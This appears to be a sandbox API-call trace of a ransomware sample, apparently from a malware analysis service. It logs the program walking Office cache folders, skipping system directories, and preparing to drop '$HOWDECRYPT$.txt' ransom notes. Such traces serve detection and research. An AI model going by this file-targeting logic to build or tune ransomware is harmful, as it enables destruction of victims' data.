[0084.093] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0084.093] StrStrIW (lpFirst="AccessMUI.msi", lpSrch=".spyhunter") returned 0x0 [0084.093] lstrcmpW (lpString1="AccessMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.093] lstrcmpW (lpString1="AccessMUI.msi", lpString2="_uninstalling_.png") returned 1 [0084.093] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 93 [0084.093] GetProcessHeap () returned 0x2c0000 [0084.093] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x320e30 [0084.093] GetProcessHeap () returned 0x2c0000 [0084.093] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4e8) returned 0x32f610 [0084.093] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.093] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="Windows") returned -1 [0084.093] lstrlenW (lpString="Windows") returned 7 [0084.093] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="$Recycle.bin") returned 1 [0084.093] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.093] lstrcmpiW (lpString1="AccessMUI.xml", lpString2="System Volume Information") returned -1 [0084.093] lstrlenW (lpString="System Volume Information") returned 25 [0084.094] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0084.094] StrStrIW (lpFirst="AccessMUI.xml", lpSrch=".spyhunter") returned 0x0 [0084.094] lstrcmpW (lpString1="AccessMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.094] lstrcmpW (lpString1="AccessMUI.xml", lpString2="_uninstalling_.png") returned 1 [0084.094] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned 93 [0084.094] GetProcessHeap () returned 0x2c0000 [0084.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfc) returned 0x32f410 [0084.094] GetProcessHeap () returned 0x2c0000 [0084.094] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4f0) returned 0x32f610 [0084.094] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.094] lstrcmpiW (lpString1="AccLR.cab", lpString2="Windows") returned -1 [0084.094] lstrlenW (lpString="Windows") returned 7 [0084.094] lstrcmpiW (lpString1="AccLR.cab", lpString2="$Recycle.bin") returned 1 [0084.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.094] lstrcmpiW (lpString1="AccLR.cab", lpString2="System Volume Information") returned -1 [0084.094] lstrlenW (lpString="System Volume Information") returned 25 [0084.094] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0084.094] StrStrIW (lpFirst="AccLR.cab", lpSrch=".spyhunter") returned 0x0 [0084.094] lstrcmpW (lpString1="AccLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.094] lstrcmpW (lpString1="AccLR.cab", lpString2="_uninstalling_.png") returned 1 [0084.094] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned 89 [0084.094] GetProcessHeap () returned 0x2c0000 [0084.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x330b20 [0084.094] GetProcessHeap () returned 0x2c0000 [0084.094] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4f8) returned 0x32f610 [0084.094] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.094] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0084.094] lstrlenW (lpString="Windows") returned 7 [0084.094] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0084.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.094] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0084.094] lstrlenW (lpString="System Volume Information") returned 25 [0084.094] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0084.095] StrStrIW (lpFirst="branding.xml", lpSrch=".spyhunter") returned 0x0 [0084.095] lstrcmpW (lpString1="branding.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.095] lstrcmpW (lpString1="branding.xml", lpString2="_uninstalling_.png") returned 1 [0084.095] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0084.095] GetProcessHeap () returned 0x2c0000 [0084.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfa) returned 0x330c20 [0084.095] GetProcessHeap () returned 0x2c0000 [0084.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x500) returned 0x32f610 [0084.095] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0 [0084.095] FindClose (in: hFindFile=0x335ee0 | out: hFindFile=0x335ee0) returned 1 [0084.095] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\$HOWDECRYPT$.txt") returned 96 [0084.095] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\$HOWDECRYPT$.txt") returned 96 [0084.096] GetProcessHeap () returned 0x2c0000 [0084.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x102) returned 0x32fb18 [0084.096] GetProcessHeap () returned 0x2c0000 [0084.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x508) returned 0x32fc28 [0084.096] GetProcessHeap () returned 0x2c0000 [0084.096] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33efe8 | out: hHeap=0x2c0000) returned 1 [0084.096] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.096] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="Windows") returned -1 [0084.096] lstrlenW (lpString="Windows") returned 7 [0084.096] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="$Recycle.bin") returned 1 [0084.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.096] lstrcmpiW (lpString1="AccessMUISet.msi", lpString2="System Volume Information") returned -1 [0084.096] lstrlenW (lpString="System Volume Information") returned 25 [0084.096] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0084.096] StrStrIW (lpFirst="AccessMUISet.msi", lpSrch=".spyhunter") returned 0x0 [0084.096] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.096] lstrcmpW (lpString1="AccessMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0084.096] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.msi") returned 83 [0084.096] GetProcessHeap () returned 0x2c0000 [0084.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328288 [0084.096] GetProcessHeap () returned 0x2c0000 [0084.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x510) returned 0x32fc28 [0084.097] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.097] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="Windows") returned -1 [0084.097] lstrlenW (lpString="Windows") returned 7 [0084.097] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="$Recycle.bin") returned 1 [0084.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.097] lstrcmpiW (lpString1="AccessMUISet.xml", lpString2="System Volume Information") returned -1 [0084.097] lstrlenW (lpString="System Volume Information") returned 25 [0084.097] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0084.097] StrStrIW (lpFirst="AccessMUISet.xml", lpSrch=".spyhunter") returned 0x0 [0084.097] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.097] lstrcmpW (lpString1="AccessMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0084.097] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\AccessMUISet.xml") returned 83 [0084.097] GetProcessHeap () returned 0x2c0000 [0084.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328198 [0084.097] GetProcessHeap () returned 0x2c0000 [0084.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x518) returned 0x32fc28 [0084.097] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.097] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0084.097] lstrlenW (lpString="Windows") returned 7 [0084.097] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0084.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.097] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0084.097] lstrlenW (lpString="System Volume Information") returned 25 [0084.097] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.097] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0084.097] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.097] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0084.097] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.097] GetProcessHeap () returned 0x2c0000 [0084.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326600 [0084.097] GetProcessHeap () returned 0x2c0000 [0084.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x520) returned 0x32fc28 [0084.098] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0084.098] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0084.098] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.098] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.098] GetProcessHeap () returned 0x2c0000 [0084.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328378 [0084.098] GetProcessHeap () returned 0x2c0000 [0084.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x528) returned 0x32fc28 [0084.098] GetProcessHeap () returned 0x2c0000 [0084.098] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0084.098] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.098] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0084.098] lstrlenW (lpString="Windows") returned 7 [0084.098] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0084.098] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.098] lstrcmpiW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0084.098] lstrlenW (lpString="System Volume Information") returned 25 [0084.098] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned 66 [0084.098] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.098] lstrcmpW (lpString1="{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.098] GetProcessHeap () returned 0x2c0000 [0084.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0084.098] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*") returned 68 [0084.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0084.477] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.477] lstrlenW (lpString="Windows") returned 7 [0084.477] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.477] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.477] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.477] lstrlenW (lpString="System Volume Information") returned 25 [0084.477] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.477] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.477] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0084.477] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.477] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0084.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.477] GetProcessHeap () returned 0x2c0000 [0084.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x3238b8 [0084.477] GetProcessHeap () returned 0x2c0000 [0084.477] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x4f8) returned 0x32fc28 [0084.477] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.477] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.477] lstrlenW (lpString="Windows") returned 7 [0084.478] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.478] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.478] lstrlenW (lpString="System Volume Information") returned 25 [0084.478] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.478] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0084.478] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.478] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0084.478] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.478] GetProcessHeap () returned 0x2c0000 [0084.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323990 [0084.478] GetProcessHeap () returned 0x2c0000 [0084.478] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x500) returned 0x32fc28 [0084.478] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.478] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0084.478] lstrlenW (lpString="Windows") returned 7 [0084.478] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0084.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.478] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0084.478] lstrlenW (lpString="System Volume Information") returned 25 [0084.478] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.478] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".spyhunter") returned 0x0 [0084.478] lstrcmpW (lpString1="Office32WW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.478] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0084.478] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.478] GetProcessHeap () returned 0x2c0000 [0084.478] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328198 [0084.478] GetProcessHeap () returned 0x2c0000 [0084.478] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x508) returned 0x32fc28 [0084.478] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.478] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0084.478] lstrlenW (lpString="Windows") returned 7 [0084.478] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0084.478] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.478] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0084.479] lstrlenW (lpString="System Volume Information") returned 25 [0084.479] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.479] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".spyhunter") returned 0x0 [0084.479] lstrcmpW (lpString1="Office32WW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.479] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0084.479] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.479] GetProcessHeap () returned 0x2c0000 [0084.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328378 [0084.479] GetProcessHeap () returned 0x2c0000 [0084.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x510) returned 0x32fc28 [0084.479] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.479] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0084.479] lstrlenW (lpString="Windows") returned 7 [0084.479] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0084.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.479] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0084.479] lstrlenW (lpString="System Volume Information") returned 25 [0084.479] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.479] StrStrIW (lpFirst="ose.exe", lpSrch=".spyhunter") returned 0x0 [0084.479] lstrcmpW (lpString1="ose.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.479] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0084.479] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.479] GetProcessHeap () returned 0x2c0000 [0084.479] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x320f38 [0084.479] GetProcessHeap () returned 0x2c0000 [0084.479] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x518) returned 0x32fc28 [0084.479] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.479] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0084.479] lstrlenW (lpString="Windows") returned 7 [0084.479] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0084.479] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.479] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0084.479] lstrlenW (lpString="System Volume Information") returned 25 [0084.479] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.479] StrStrIW (lpFirst="osetup.dll", lpSrch=".spyhunter") returned 0x0 [0084.479] lstrcmpW (lpString1="osetup.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.479] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0084.479] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x3269a0 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x520) returned 0x32fc28 [0084.480] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.480] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0084.480] lstrlenW (lpString="Windows") returned 7 [0084.480] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0084.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.480] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0084.480] lstrlenW (lpString="System Volume Information") returned 25 [0084.480] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.480] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".spyhunter") returned 0x0 [0084.480] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.480] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0084.480] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326600 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x528) returned 0x32fc28 [0084.480] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.480] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0084.480] lstrlenW (lpString="Windows") returned 7 [0084.480] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0084.480] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.480] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0084.480] lstrlenW (lpString="System Volume Information") returned 25 [0084.480] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.480] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".spyhunter") returned 0x0 [0084.480] lstrcmpW (lpString1="PidGenX.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.480] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0084.480] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x326430 [0084.480] GetProcessHeap () returned 0x2c0000 [0084.480] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x530) returned 0x32fc28 [0084.480] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.481] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0084.481] lstrlenW (lpString="Windows") returned 7 [0084.481] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0084.481] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.481] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0084.481] lstrlenW (lpString="System Volume Information") returned 25 [0084.481] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.481] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".spyhunter") returned 0x0 [0084.481] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.481] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0084.481] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.481] GetProcessHeap () returned 0x2c0000 [0084.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x333d30 [0084.481] GetProcessHeap () returned 0x2c0000 [0084.481] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x538) returned 0x32fc28 [0084.481] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="Windows") returned -1 [0084.481] lstrlenW (lpString="Windows") returned 7 [0084.481] lstrcmpiW (lpString1="ProPlusrWW.msi", lpString2="$Recycle.bin") returned 1 [0084.481] 